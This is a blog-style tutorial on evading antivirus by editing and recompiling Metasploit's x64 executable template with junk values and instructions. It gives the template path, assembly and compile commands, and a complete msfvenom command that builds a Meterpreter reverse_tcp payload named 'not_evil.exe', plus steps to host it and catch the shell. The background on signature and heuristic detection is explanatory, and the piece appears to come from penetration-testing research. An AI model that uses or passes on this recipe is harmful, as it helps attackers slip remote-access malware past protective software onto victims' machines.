AV Evasion With x64 Payload Template Editing

Antivirus is broken.

It's an incendiary statement, but it's only partially true. It's true in that AV solutions are easily fooled into letting threats through. The means necessary to fool AV vary in context, but they're there. And it's a lower hanging fruit than you'd expect.

What started out as development research for a possible automated payload obfuscation tool ended up being what could very well be a new hobby: participating in the decades-long running battle between antivirus vendors on one side and security researchers/hackers on the other.

In this article I'm going to demonstrate one method in evading antivirus that (as of this writing) may be more effective with modern antivirus suites by utilizing x64 based payloads.

To proceed, it's necessary to understand the broad strokes of how antivirus programs detect threats. For the purposes of this article, I'll briefly explain two methods: signature-based detection and heuristic analysis.

Signature-based malware detection is when a program's process is compared to a database of known malware processes or hash values and produces a positive result when there's a match. 

This works because the lion's share of malware floating around in the wild wasn't written by your average 1337 haxx0r. Rather, it was generated by well-known open-source tools or perhaps not-so-open source tools with dubious origins.

In time, that malware would get around, people would figure out what it looked like, AV programs were patched to include those new signatures and the cycle continued anew.

This guy seems familiar somehow... I just can't put my finger on it...

Heuristic analysis is when AV observes the behavior of the malware in a variety of different ways (e.g. running the malware in an emulated or sandboxed environment, disassembling it to follow assembly language subroutines, looking for the presence of frequently used API libraries and so on) to produce a positive or negative result.

The thresholds are proprietary to the AV suite as are the methods they use to detect your reverse shell you're trying to sneak past them, so it's not useful to pick that apart.

The takeaway is that your malware's “look” isn't the only way it gets caught. It's also its behavior. It's not enough to just wear a pair of glasses to disguise yourself.

The first method I learned to defeat antivirus was to simply recompile the template Msfvenom uses to compile exe files and include that in the Msfvenom command.

You can build on this technique by altering some variable values or adding in junk data to the template that will have no bearing on the functionality of the template itself. In this way you're changing both the signature and the behavior.

The templates are located in /usr/share/metasploit-framework/data/templates/src/pe/exe.

Maybe in the old days a simple recompilation may have had a higher percentage success rate. Nowadays, recompiling after adding a little junk data doesn't work very well, at least not for x86 based payloads.

But it sure works well for x64 based payloads!

Why is that? Well, going back to what I mentioned previously, most people were writing malware for 32 bit architecture to make the attack surface as broad as possible. The reasoning here being it's not about a specific target, but about any target at all.

64-bit based payloads weren't as common historically and so antivirus solutions aren't as sensitive to them.

The target machine in this proof-of-concept is a Windows 10 box running the latest offline version of Avast that was available on 4/28/2021.

Here's what you'll need that you may not have:

Assembler of your choice (I used JWasm)

https://github.com/JWasm/JWasm

MinGW

apt install mingw-w64

A pony (optional)

Going back into /usr/share/metasploit-framework/data/templates/src/pe/exe you'll see a file named template_e64_windows.asm. This is an assembly language file that you'll open up with whatever text editor you want.

Assembly language can be daunting, but it's less complicated than you might think. It might be a good idea to check out a crash course on assembly so you can get a good idea of what you're looking at. It's not a prerequisite, but it is recommended.

There are a few places where it's evident we can change values without affecting the overall functionality of the template.

Go in and change the values from 4096 to whatever you want it to be. Ideally a larger number.

To go the extra mile, I took a page from the payload obfuscation technique of ghostwriting and added in some junk assembly instructions on the line before a register's value is zeroed out (xor rcx, rcx).

Save the file under a new name. I merely appended a "1" at the end of the filename.
The next step is to assemble the .asm file with JWasm

jwasm -win64 template_x64_windows1.asm

compile the object file

x86_64-w64-mingw32-gcc template_x64_windows1.o -o av64bypass.exe

and generate the malware

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.192.10 LPORT=4444 -x /usr/share/metasploit-framework/data/templates/src/pe/exe/av64bypass.exe -f exe > not_evil.exe

Next, I'll host the file on my own server with python and connect to it from the target. Start up the Meterpreter handler and set the payload and LHOST options appropriately.
All that's left is to execute the file and pwn!

Special thanks to Joff Theyer of Black Hills Information Security for his research!

See you, Space Cowboy...